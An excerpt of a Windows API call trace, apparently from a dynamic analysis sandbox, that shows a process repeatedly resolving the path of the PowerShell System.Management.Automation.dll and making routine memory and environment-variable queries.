	[0356.576] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.577] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.577] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.577] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.578] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.582] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.583] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.584] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.585] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.586] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.588] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.603] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.950] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.951] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0356.951] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.957] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.957] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.957] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.960] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0356.967] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.967] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.967] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.968] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.968] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.968] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.968] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.968] CoTaskMemFree (pv=0x1b7a8b00) 
	[0356.974] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0356.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.974] CoTaskMemFree (pv=0x1b7a8b00) 
	[0357.063] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0357.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.063] CoTaskMemFree (pv=0x1b7a8b00) 
	[0357.065] CoTaskMemAlloc (cb=0x104) returned 0x1b7a8b00
	[0357.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b7a8b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.065] CoTaskMemFree (pv=0x1b7a8b00) 
	[0357.070] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0357.073] VirtualQuery (in: lpAddress=0x10b570, lpBuffer=0x10c430, dwLength=0x30 | out: lpBuffer=0x10c430*(BaseAddress=0x10b000, AllocationBase=0x90000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
